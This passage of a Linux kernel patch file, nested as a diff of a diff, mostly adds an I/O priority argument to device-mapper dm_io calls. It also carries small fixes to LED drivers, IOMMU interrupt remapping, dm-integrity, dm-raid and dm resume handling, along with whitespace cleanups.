++#define iommu_cntrcap_egcnt(p)			(((p) >> 28) & 0xf)
++
++#define iommu_event_select(p)			((p) & 0xfffffff)
++#define iommu_event_group(p)			(((p) >> 28) & 0xf)
++
++#ifdef CONFIG_INTEL_IOMMU_PERF_EVENTS
++int alloc_iommu_pmu(struct intel_iommu *iommu);
++void free_iommu_pmu(struct intel_iommu *iommu);
++#else
++static inline int
++alloc_iommu_pmu(struct intel_iommu *iommu)
++{
++	return 0;
++}
++
++static inline void
++free_iommu_pmu(struct intel_iommu *iommu)
++{
++}
++#endif /* CONFIG_INTEL_IOMMU_PERF_EVENTS */
+diff --git a/drivers/iommu/irq_remapping.c b/drivers/iommu/irq_remapping.c
+index 83314b9d8f38b..ee59647c20501 100644
+--- a/drivers/iommu/irq_remapping.c
++++ b/drivers/iommu/irq_remapping.c
+@@ -99,7 +99,8 @@ int __init irq_remapping_prepare(void)
+ 	if (disable_irq_remap)
+ 		return -ENOSYS;
+ 
+-	if (intel_irq_remap_ops.prepare() == 0)
++	if (IS_ENABLED(CONFIG_INTEL_IOMMU) &&
++	    intel_irq_remap_ops.prepare() == 0)
+ 		remap_ops = &intel_irq_remap_ops;
+ 	else if (IS_ENABLED(CONFIG_AMD_IOMMU) &&
+ 		 amd_iommu_irq_ops.prepare() == 0)
+diff --git a/drivers/leds/flash/leds-sgm3140.c b/drivers/leds/flash/leds-sgm3140.c
+index d3a30ad94ac46..dd5d327c52a10 100644
+--- a/drivers/leds/flash/leds-sgm3140.c
++++ b/drivers/leds/flash/leds-sgm3140.c
+@@ -114,8 +114,11 @@ static int sgm3140_brightness_set(struct led_classdev *led_cdev,
+ 				"failed to enable regulator: %d\n", ret);
+ 			return ret;
+ 		}
++		gpiod_set_value_cansleep(priv->flash_gpio, 0);
+ 		gpiod_set_value_cansleep(priv->enable_gpio, 1);
+ 	} else {
++		del_timer_sync(&priv->powerdown_timer);
++		gpiod_set_value_cansleep(priv->flash_gpio, 0);
+ 		gpiod_set_value_cansleep(priv->enable_gpio, 0);
+ 		ret = regulator_disable(priv->vin_regulator);
+ 		if (ret) {
+diff --git a/drivers/leds/leds-aw2013.c b/drivers/leds/leds-aw2013.c
+index 0b52fc9097c6e..3c05958578a1c 100644
+--- a/drivers/leds/leds-aw2013.c
++++ b/drivers/leds/leds-aw2013.c
+@@ -397,6 +397,7 @@ static int aw2013_probe(struct i2c_client *client)
+ 	regulator_disable(chip->vcc_regulator);
+ 
+ error:
++	mutex_unlock(&chip->mutex);
+ 	mutex_destroy(&chip->mutex);
+ 	return ret;
+ }
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 100a6a236d92a..ec662f97ba828 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -614,7 +614,7 @@ static void use_dmio(struct dm_buffer *b, enum req_op op, sector_t sector,
+ 		io_req.mem.ptr.vma = (char *)b->data + offset;
+ 	}
+ 
+-	r = dm_io(&io_req, 1, &region, NULL);
++	r = dm_io(&io_req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		b->end_io(b, errno_to_blk_status(r));
+ }
+@@ -1375,7 +1375,7 @@ int dm_bufio_issue_flush(struct dm_bufio_client *c)
+ 
+ 	BUG_ON(dm_bufio_in_request());
+ 
+-	return dm_io(&io_req, 1, &io_reg, NULL);
++	return dm_io(&io_req, 1, &io_reg, NULL, IOPRIO_DEFAULT);
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_issue_flush);
+ 
+@@ -1398,7 +1398,7 @@ int dm_bufio_issue_discard(struct dm_bufio_client *c, sector_t block, sector_t c
+ 
+ 	BUG_ON(dm_bufio_in_request());
+ 
+-	return dm_io(&io_req, 1, &io_reg, NULL);
++	return dm_io(&io_req, 1, &io_reg, NULL, IOPRIO_DEFAULT);
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_issue_discard);
+ 
+diff --git a/drivers/md/dm-cache-policy.h b/drivers/md/dm-cache-policy.h
+index 6ba3e9c91af53..8bc21d54884e9 100644
+--- a/drivers/md/dm-cache-policy.h
++++ b/drivers/md/dm-cache-policy.h
+@@ -75,7 +75,7 @@ struct dm_cache_policy {
+ 	 * background work.
+ 	 */
+ 	int (*get_background_work)(struct dm_cache_policy *p, bool idle,
+-			           struct policy_work **result);
++				   struct policy_work **result);
+ 
+ 	/*
+ 	 * You must pass in the same work pointer that you were given, not
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 3e215aa85b99a..25e51dc6e5598 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -52,11 +52,11 @@
+ struct convert_context {
+ 	struct completion restart;
+ 	struct bio *bio_in;
+-	struct bio *bio_out;
+ 	struct bvec_iter iter_in;
++	struct bio *bio_out;
+ 	struct bvec_iter iter_out;
+-	u64 cc_sector;
+ 	atomic_t cc_pending;
++	u64 cc_sector;
+ 	union {
+ 		struct skcipher_request *req;
+ 		struct aead_request *req_aead;
+@@ -2535,7 +2535,7 @@ static int crypt_set_keyring_key(struct crypt_config *cc, const char *key_string
+ 		type = &key_type_encrypted;
+ 		set_key = set_key_encrypted;
+ 	} else if (IS_ENABLED(CONFIG_TRUSTED_KEYS) &&
+-	           !strncmp(key_string, "trusted:", key_desc - key_string + 1)) {
++		   !strncmp(key_string, "trusted:", key_desc - key_string + 1)) {
+ 		type = &key_type_trusted;
+ 		set_key = set_key_trusted;
+ 	} else {
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 3da4359f51645..9c9e2b50c63c3 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -579,7 +579,7 @@ static int sync_rw_sb(struct dm_integrity_c *ic, blk_opf_t opf)
+ 		}
+ 	}
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		return r;
+ 
+@@ -1089,7 +1089,7 @@ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+ 	io_loc.sector = ic->start + SB_SECTORS + sector;
+ 	io_loc.count = n_sectors;
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r)) {
+ 		dm_integrity_io_error(ic, (opf & REQ_OP_MASK) == REQ_OP_READ ?
+ 				      "reading journal" : "writing journal", r);
+@@ -1205,7 +1205,7 @@ static void copy_from_journal(struct dm_integrity_c *ic, unsigned int section, u
+ 	io_loc.sector = target;
+ 	io_loc.count = n_sectors;
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r)) {
+ 		WARN_ONCE(1, "asynchronous dm_io failed: %d", r);
+ 		fn(-1UL, data);
+@@ -1532,7 +1532,7 @@ static void dm_integrity_flush_buffers(struct dm_integrity_c *ic, bool flush_dat
+ 		fr.io_reg.count = 0,
+ 		fr.ic = ic;
+ 		init_completion(&fr.comp);
+-		r = dm_io(&fr.io_req, 1, &fr.io_reg, NULL);
++		r = dm_io(&fr.io_req, 1, &fr.io_reg, NULL, IOPRIO_DEFAULT);
+ 		BUG_ON(r);
+ 	}
+ 
+@@ -1709,7 +1709,6 @@ static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checks
+ 	struct bio_vec bv;
+ 	sector_t sector, logical_sector, area, offset;
+ 	struct page *page;
+-	void *buffer;
+ 
+ 	get_area_and_offset(ic, dio->range.logical_sector, &area, &offset);
+ 	dio->metadata_block = get_metadata_sector_and_offset(ic, area, offset,
+@@ -1718,13 +1717,14 @@ static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checks
+ 	logical_sector = dio->range.logical_sector;
+ 
+ 	page = mempool_alloc(&ic->recheck_pool, GFP_NOIO);
+-	buffer = page_to_virt(page);
+ 
+ 	__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
+ 		unsigned pos = 0;
+ 
+ 		do {
++			sector_t alignment;
+ 			char *mem;
++			char *buffer = page_to_virt(page);
+ 			int r;
+ 			struct dm_io_request io_req;
+ 			struct dm_io_region io_loc;
+@@ -1737,7 +1737,15 @@ static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checks
+ 			io_loc.sector = sector;
+ 			io_loc.count = ic->sectors_per_block;
+ 
+-			r = dm_io(&io_req, 1, &io_loc, NULL);
++			/* Align the bio to logical block size */
++			alignment = dio->range.logical_sector | bio_sectors(bio) | (PAGE_SIZE >> SECTOR_SHIFT);
++			alignment &= -alignment;
++			io_loc.sector = round_down(io_loc.sector, alignment);
++			io_loc.count += sector - io_loc.sector;
++			buffer += (sector - io_loc.sector) << SECTOR_SHIFT;
++			io_loc.count = round_up(io_loc.count, alignment);
++
++			r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 			if (unlikely(r)) {
+ 				dio->bi_status = errno_to_blk_status(r);
+ 				goto free_ret;
+@@ -1856,12 +1864,12 @@ static void integrity_metadata(struct work_struct *w)
+ 			r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+ 						checksums_ptr - checksums, dio->op == REQ_OP_READ ? TAG_CMP : TAG_WRITE);
+ 			if (unlikely(r)) {
++				if (likely(checksums != checksums_onstack))
++					kfree(checksums);
+ 				if (r > 0) {
+-					integrity_recheck(dio, checksums);
++					integrity_recheck(dio, checksums_onstack);
+ 					goto skip_io;
+ 				}
+-				if (likely(checksums != checksums_onstack))
+-					kfree(checksums);
+ 				goto error;
+ 			}
+ 
+@@ -2367,7 +2375,6 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 		else
+ skip_check:
+ 			dec_in_flight(dio);
+-
+ 	} else {
+ 		INIT_WORK(&dio->work, integrity_metadata);
+ 		queue_work(ic->metadata_wq, &dio->work);
+@@ -2775,7 +2782,7 @@ static void integrity_recalc(struct work_struct *w)
+ 	io_loc.sector = get_data_sector(ic, area, offset);
+ 	io_loc.count = n_sectors;
+ 
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r)) {
+ 		dm_integrity_io_error(ic, "reading data", r);
+ 		goto err;
+@@ -4151,7 +4158,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 		} else if (sscanf(opt_string, "block_size:%u%c", &val, &dummy) == 1) {
+ 			if (val < 1 << SECTOR_SHIFT ||
+ 			    val > MAX_SECTORS_PER_BLOCK << SECTOR_SHIFT ||
+-			    (val & (val -1))) {
++			    (val & (val - 1))) {
+ 				r = -EINVAL;
+ 				ti->error = "Invalid block_size argument";
+ 				goto bad;
+@@ -4477,7 +4484,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 	if (ic->internal_hash) {
+ 		size_t recalc_tags_size;
+ 		ic->recalc_wq = alloc_workqueue("dm-integrity-recalc", WQ_MEM_RECLAIM, 1);
+-		if (!ic->recalc_wq ) {
++		if (!ic->recalc_wq) {
+ 			ti->error = "Cannot allocate workqueue";
+ 			r = -ENOMEM;
+ 			goto bad;
+diff --git a/drivers/md/dm-io.c b/drivers/md/dm-io.c
+index e488b05e35fa3..ec97658387c39 100644
+--- a/drivers/md/dm-io.c
++++ b/drivers/md/dm-io.c
+@@ -295,7 +295,7 @@ static void km_dp_init(struct dpages *dp, void *data)
+  *---------------------------------------------------------------*/
+ static void do_region(const blk_opf_t opf, unsigned int region,
+ 		      struct dm_io_region *where, struct dpages *dp,
+-		      struct io *io)
++		      struct io *io, unsigned short ioprio)
+ {
+ 	struct bio *bio;
+ 	struct page *page;
+@@ -344,6 +344,7 @@ static void do_region(const blk_opf_t opf, unsigned int region,
+ 				       &io->client->bios);
+ 		bio->bi_iter.bi_sector = where->sector + (where->count - remaining);
+ 		bio->bi_end_io = endio;
++		bio->bi_ioprio = ioprio;
+ 		store_io_and_region_in_bio(bio, io, region);
+ 
+ 		if (op == REQ_OP_DISCARD || op == REQ_OP_WRITE_ZEROES) {
+@@ -371,7 +372,7 @@ static void do_region(const blk_opf_t opf, unsigned int region,
+ 
+ static void dispatch_io(blk_opf_t opf, unsigned int num_regions,
+ 			struct dm_io_region *where, struct dpages *dp,
+-			struct io *io, int sync)
++			struct io *io, int sync, unsigned short ioprio)
+ {
+ 	int i;
+ 	struct dpages old_pages = *dp;
+@@ -388,7 +389,7 @@ static void dispatch_io(blk_opf_t opf, unsigned int num_regions,
+ 	for (i = 0; i < num_regions; i++) {
+ 		*dp = old_pages;
+ 		if (where[i].count || (opf & REQ_PREFLUSH))
+-			do_region(opf, i, where + i, dp, io);
++			do_region(opf, i, where + i, dp, io, ioprio);
+ 	}
+ 
+ 	/*
+@@ -413,7 +414,7 @@ static void sync_io_complete(unsigned long error, void *context)
+ 
+ static int sync_io(struct dm_io_client *client, unsigned int num_regions,
+ 		   struct dm_io_region *where, blk_opf_t opf, struct dpages *dp,
+-		   unsigned long *error_bits)
++		   unsigned long *error_bits, unsigned short ioprio)
+ {
+ 	struct io *io;
+ 	struct sync_io sio;
+@@ -435,7 +436,7 @@ static int sync_io(struct dm_io_client *client, unsigned int num_regions,
+ 	io->vma_invalidate_address = dp->vma_invalidate_address;
+ 	io->vma_invalidate_size = dp->vma_invalidate_size;
+ 
+-	dispatch_io(opf, num_regions, where, dp, io, 1);
++	dispatch_io(opf, num_regions, where, dp, io, 1, ioprio);
+ 
+ 	wait_for_completion_io(&sio.wait);
+ 
+@@ -447,7 +448,8 @@ static int sync_io(struct dm_io_client *client, unsigned int num_regions,
+ 
+ static int async_io(struct dm_io_client *client, unsigned int num_regions,
+ 		    struct dm_io_region *where, blk_opf_t opf,
+-		    struct dpages *dp, io_notify_fn fn, void *context)
++		    struct dpages *dp, io_notify_fn fn, void *context,
++		    unsigned short ioprio)
+ {
+ 	struct io *io;
+ 
+@@ -467,7 +469,7 @@ static int async_io(struct dm_io_client *client, unsigned int num_regions,
+ 	io->vma_invalidate_address = dp->vma_invalidate_address;
+ 	io->vma_invalidate_size = dp->vma_invalidate_size;
+ 
+-	dispatch_io(opf, num_regions, where, dp, io, 0);
++	dispatch_io(opf, num_regions, where, dp, io, 0, ioprio);
+ 	return 0;
+ }
+ 
+@@ -509,7 +511,8 @@ static int dp_init(struct dm_io_request *io_req, struct dpages *dp,
+ }
+ 
+ int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+-	  struct dm_io_region *where, unsigned long *sync_error_bits)
++	  struct dm_io_region *where, unsigned long *sync_error_bits,
++	  unsigned short ioprio)
+ {
+ 	int r;
+ 	struct dpages dp;
+@@ -520,11 +523,11 @@ int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+ 
+ 	if (!io_req->notify.fn)
+ 		return sync_io(io_req->client, num_regions, where,
+-			       io_req->bi_opf, &dp, sync_error_bits);
++			       io_req->bi_opf, &dp, sync_error_bits, ioprio);
+ 
+ 	return async_io(io_req->client, num_regions, where,
+ 			io_req->bi_opf, &dp, io_req->notify.fn,
+-			io_req->notify.context);
++			io_req->notify.context, ioprio);
+ }
+ EXPORT_SYMBOL(dm_io);
+ 
+diff --git a/drivers/md/dm-kcopyd.c b/drivers/md/dm-kcopyd.c
+index 0ef78e56aa88c..fda51bd140ed3 100644
+--- a/drivers/md/dm-kcopyd.c
++++ b/drivers/md/dm-kcopyd.c
+@@ -572,9 +572,9 @@ static int run_io_job(struct kcopyd_job *job)
+ 	io_job_start(job->kc->throttle);
+ 
+ 	if (job->op == REQ_OP_READ)
+-		r = dm_io(&io_req, 1, &job->source, NULL);
++		r = dm_io(&io_req, 1, &job->source, NULL, IOPRIO_DEFAULT);
+ 	else
+-		r = dm_io(&io_req, job->num_dests, job->dests, NULL);
++		r = dm_io(&io_req, job->num_dests, job->dests, NULL, IOPRIO_DEFAULT);
+ 
+ 	return r;
+ }
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index 05141eea18d3c..da77878cb2c02 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -295,7 +295,7 @@ static int rw_header(struct log_c *lc, enum req_op op)
+ {
+ 	lc->io_req.bi_opf = op;
+ 
+-	return dm_io(&lc->io_req, 1, &lc->header_location, NULL);
++	return dm_io(&lc->io_req, 1, &lc->header_location, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ static int flush_header(struct log_c *lc)
+@@ -308,7 +308,7 @@ static int flush_header(struct log_c *lc)
+ 
+ 	lc->io_req.bi_opf = REQ_OP_WRITE | REQ_PREFLUSH;
+ 
+-	return dm_io(&lc->io_req, 1, &null_location, NULL);
++	return dm_io(&lc->io_req, 1, &null_location, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ static int read_header(struct log_c *log)
+@@ -756,8 +756,8 @@ static void core_set_region_sync(struct dm_dirty_log *log, region_t region,
+ 	log_clear_bit(lc, lc->recovering_bits, region);
+ 	if (in_sync) {
+ 		log_set_bit(lc, lc->sync_bits, region);
+-                lc->sync_count++;
+-        } else if (log_test_bit(lc->sync_bits, region)) {
++		lc->sync_count++;
++	} else if (log_test_bit(lc->sync_bits, region)) {
+ 		lc->sync_count--;
+ 		log_clear_bit(lc, lc->sync_bits, region);
+ 	}
+@@ -765,9 +765,9 @@ static void core_set_region_sync(struct dm_dirty_log *log, region_t region,
+ 
+ static region_t core_get_sync_count(struct dm_dirty_log *log)
+ {
+-        struct log_c *lc = (struct log_c *) log->context;
++	struct log_c *lc = (struct log_c *) log->context;
+ 
+-        return lc->sync_count;
++	return lc->sync_count;
+ }
+ 
+ #define	DMEMIT_SYNC \
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index 4b7528dc2fd08..bf833ca880bc1 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -362,8 +362,8 @@ static struct {
+ 	const int mode;
+ 	const char *param;
+ } _raid456_journal_mode[] = {
+-	{ R5C_JOURNAL_MODE_WRITE_THROUGH , "writethrough" },
+-	{ R5C_JOURNAL_MODE_WRITE_BACK    , "writeback" }
++	{ R5C_JOURNAL_MODE_WRITE_THROUGH, "writethrough" },
++	{ R5C_JOURNAL_MODE_WRITE_BACK,    "writeback" }
+ };
+ 
+ /* Return MD raid4/5/6 journal mode for dm @journal_mode one */
+@@ -1114,7 +1114,7 @@ static int validate_raid_redundancy(struct raid_set *rs)
+  *    [stripe_cache <sectors>]		Stripe cache size for higher RAIDs
+  *    [region_size <sectors>]		Defines granularity of bitmap
+  *    [journal_dev <dev>]		raid4/5/6 journaling deviice
+- *    					(i.e. write hole closing log)
++ *					(i.e. write hole closing log)
+  *
+  * RAID10-only options:
+  *    [raid10_copies <# copies>]	Number of copies.  (Default: 2)
+@@ -3325,14 +3325,14 @@ static int raid_map(struct dm_target *ti, struct bio *bio)
+ 	struct mddev *mddev = &rs->md;
+ 
+ 	/*
+-	 * If we're reshaping to add disk(s)), ti->len and
++	 * If we're reshaping to add disk(s), ti->len and
+ 	 * mddev->array_sectors will differ during the process
+ 	 * (ti->len > mddev->array_sectors), so we have to requeue
+ 	 * bios with addresses > mddev->array_sectors here or
+ 	 * there will occur accesses past EOD of the component
+ 	 * data images thus erroring the raid set.
+ 	 */
+-	if (unlikely(bio_end_sector(bio) > mddev->array_sectors))
++	if (unlikely(bio_has_data(bio) && bio_end_sector(bio) > mddev->array_sectors))
+ 		return DM_MAPIO_REQUEUE;
+ 
+ 	md_handle_request(mddev, bio);
+@@ -3999,7 +3999,7 @@ static int raid_preresume(struct dm_target *ti)
+ 	}
+ 
+ 	/* Resize bitmap to adjust to changed region size (aka MD bitmap chunksize) or grown device size */
+-        if (test_bit(RT_FLAG_RS_BITMAP_LOADED, &rs->runtime_flags) && mddev->bitmap &&
++	if (test_bit(RT_FLAG_RS_BITMAP_LOADED, &rs->runtime_flags) && mddev->bitmap &&
+ 	    (test_bit(RT_FLAG_RS_GROW, &rs->runtime_flags) ||
+ 	     (rs->requested_bitmap_chunk_sectors &&
+ 	       mddev->bitmap_info.chunksize != to_bytes(rs->requested_bitmap_chunk_sectors)))) {
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index c38e63706d911..1004199ae77ac 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -273,7 +273,7 @@ static int mirror_flush(struct dm_target *ti)
+ 	}
+ 
+ 	error_bits = -1;
+-	dm_io(&io_req, ms->nr_mirrors, io, &error_bits);
++	dm_io(&io_req, ms->nr_mirrors, io, &error_bits, IOPRIO_DEFAULT);
+ 	if (unlikely(error_bits != 0)) {
+ 		for (i = 0; i < ms->nr_mirrors; i++)
+ 			if (test_bit(i, &error_bits))
+@@ -543,7 +543,7 @@ static void read_async_bio(struct mirror *m, struct bio *bio)
+ 
+ 	map_region(&io, m, bio);
+ 	bio_set_m(bio, m);
+-	BUG_ON(dm_io(&io_req, 1, &io, NULL));
++	BUG_ON(dm_io(&io_req, 1, &io, NULL, IOPRIO_DEFAULT));
+ }
+ 
+ static inline int region_in_sync(struct mirror_set *ms, region_t region,
+@@ -670,7 +670,7 @@ static void do_write(struct mirror_set *ms, struct bio *bio)
+ 	 */
+ 	bio_set_m(bio, get_default_mirror(ms));
+ 
+-	BUG_ON(dm_io(&io_req, ms->nr_mirrors, io, NULL));
++	BUG_ON(dm_io(&io_req, ms->nr_mirrors, io, NULL, IOPRIO_DEFAULT));
+ }
+ 
+ static void do_writes(struct mirror_set *ms, struct bio_list *writes)
+@@ -902,7 +902,7 @@ static struct mirror_set *alloc_context(unsigned int nr_mirrors,
+ 	if (IS_ERR(ms->io_client)) {
+ 		ti->error = "Error creating dm_io client";
+ 		kfree(ms);
+- 		return NULL;
++		return NULL;
+ 	}
+ 
+ 	ms->rh = dm_region_hash_create(ms, dispatch_bios, wakeup_mirrord,
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 80b95746a43e0..eee1cd3aa3fcf 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -220,7 +220,7 @@ static void do_metadata(struct work_struct *work)
+ {
+ 	struct mdata_req *req = container_of(work, struct mdata_req, work);
+ 
+-	req->result = dm_io(req->io_req, 1, req->where, NULL);
++	req->result = dm_io(req->io_req, 1, req->where, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ /*
+@@ -244,7 +244,7 @@ static int chunk_io(struct pstore *ps, void *area, chunk_t chunk, blk_opf_t opf,
+ 	struct mdata_req req;
+ 
+ 	if (!metadata)
+-		return dm_io(&io_req, 1, &where, NULL);
++		return dm_io(&io_req, 1, &where, NULL, IOPRIO_DEFAULT);
+ 
+ 	req.where = &where;
+ 	req.io_req = &io_req;
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index e0367a672eabf..aabb2435070b8 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -72,7 +72,7 @@ static sector_t high(struct dm_table *t, unsigned int l, unsigned int n)
+ 		n = get_child(n, CHILDREN_PER_NODE - 1);
+ 
+ 	if (n >= t->counts[l])
+-		return (sector_t) - 1;
++		return (sector_t) -1;
+ 
+ 	return get_node(t, l, n)[KEYS_PER_NODE - 1];
+ }
+@@ -1533,7 +1533,7 @@ static bool dm_table_any_dev_attr(struct dm_table *t,
+ 		if (ti->type->iterate_devices &&
+ 		    ti->type->iterate_devices(ti, func, data))
+ 			return true;
+-        }
++	}
+ 
+ 	return false;
+ }
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 601f9e4e6234f..f24d89af7c5f0 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -1179,9 +1179,9 @@ static void process_prepared_discard_passdown_pt1(struct dm_thin_new_mapping *m)
+ 	discard_parent = bio_alloc(NULL, 1, 0, GFP_NOIO);
+ 	discard_parent->bi_end_io = passdown_endio;
+ 	discard_parent->bi_private = m;
+- 	if (m->maybe_shared)
+- 		passdown_double_checking_shared_status(m, discard_parent);
+- 	else {
++	if (m->maybe_shared)
++		passdown_double_checking_shared_status(m, discard_parent);
++	else {
+ 		struct discard_op op;
+ 
+ 		begin_discard(&op, tc, discard_parent);
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index b48e1b59e6da4..6a707b41dc865 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -503,7 +503,7 @@ static noinline int verity_recheck(struct dm_verity *v, struct dm_verity_io *io,
+ 	io_loc.bdev = v->data_dev->bdev;
+ 	io_loc.sector = cur_block << (v->data_dev_block_bits - SECTOR_SHIFT);
+ 	io_loc.count = 1 << (v->data_dev_block_bits - SECTOR_SHIFT);
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		goto free_ret;
+ 
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 4620a98c99561..db93a91169d5e 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -80,12 +80,12 @@ struct dm_verity_io {
+ 	/* original value of bio->bi_end_io */
+ 	bio_end_io_t *orig_bi_end_io;
+ 
++	struct bvec_iter iter;
++
+ 	sector_t block;
+ 	unsigned int n_blocks;
+ 	bool in_tasklet;
+ 
+-	struct bvec_iter iter;
+-
+ 	struct work_struct work;
+ 
+ 	char *recheck_buffer;
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index c6ff43a8f0b25..20fc84b24fc75 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -531,7 +531,7 @@ static void ssd_commit_flushed(struct dm_writecache *wc, bool wait_for_ios)
+ 		req.notify.context = &endio;
+ 
+ 		/* writing via async dm-io (implied by notify.fn above) won't return an error */
+-	        (void) dm_io(&req, 1, &region, NULL);
++		(void) dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 		i = j;
+ 	}
+ 
+@@ -568,7 +568,7 @@ static void ssd_commit_superblock(struct dm_writecache *wc)
+ 	req.notify.fn = NULL;
+ 	req.notify.context = NULL;
+ 
+-	r = dm_io(&req, 1, &region, NULL);
++	r = dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		writecache_error(wc, r, "error writing superblock");
+ }
+@@ -596,7 +596,7 @@ static void writecache_disk_flush(struct dm_writecache *wc, struct dm_dev *dev)
+ 	req.client = wc->dm_io;
+ 	req.notify.fn = NULL;
+ 
+-	r = dm_io(&req, 1, &region, NULL);
++	r = dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		writecache_error(wc, r, "error flushing metadata: %d", r);
+ }
+@@ -984,7 +984,7 @@ static int writecache_read_metadata(struct dm_writecache *wc, sector_t n_sectors
+ 	req.client = wc->dm_io;
+ 	req.notify.fn = NULL;
+ 
+-	return dm_io(&req, 1, &region, NULL);
++	return dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ static void writecache_resume(struct dm_target *ti)
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 0ec85d159bcde..29270f6f272f6 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2897,6 +2897,9 @@ static void __dm_internal_suspend(struct mapped_device *md, unsigned int suspend
+ 
+ static void __dm_internal_resume(struct mapped_device *md)
+ {
++	int r;
++	struct dm_table *map;
++
+ 	BUG_ON(!md->internal_suspend_count);
+ 
+ 	if (--md->internal_suspend_count)
+@@ -2905,12 +2908,23 @@ static void __dm_internal_resume(struct mapped_device *md)
+ 	if (dm_suspended_md(md))
+ 		goto done; /* resume from nested suspend */
+ 
+-	/*
+-	 * NOTE: existing callers don't need to call dm_table_resume_targets
+-	 * (which may fail -- so best to avoid it for now by passing NULL map)
+-	 */
+-	(void) __dm_resume(md, NULL);
+-
++	map = rcu_dereference_protected(md->map, lockdep_is_held(&md->suspend_lock));
++	r = __dm_resume(md, map);
++	if (r) {
++		/*
++		 * If a preresume method of some target failed, we are in a
++		 * tricky situation. We can't return an error to the caller. We
++		 * can't fake success because then the "resume" and
++		 * "postsuspend" methods would not be paired correctly, and it
++		 * would break various targets, for example it would cause list
++		 * corruption in the "origin" target.
++		 *
++		 * So, we fake normal suspend here, to make sure that the
++		 * "resume" and "postsuspend" methods will be paired correctly.
++		 */
++		DMERR("Preresume method failed: %d", r);
++		set_bit(DMF_SUSPENDED, &md->flags);
++	}
+ done:
+ 	clear_bit(DMF_SUSPENDED_INTERNALLY, &md->flags);
+ 	smp_mb__after_atomic();
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 846bdee4daa0e..788acc81e7a84 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -4903,11 +4903,21 @@ action_store(struct mddev *mddev, const char *page, size_t len)
+ 			return -EINVAL;
+ 		err = mddev_lock(mddev);
+ 		if (!err) {
+-			if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery))
++			if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery)) {
+ 				err =  -EBUSY;
+-			else {
++			} else if (mddev->reshape_position == MaxSector ||
++				   mddev->pers->check_reshape == NULL ||
++				   mddev->pers->check_reshape(mddev)) {
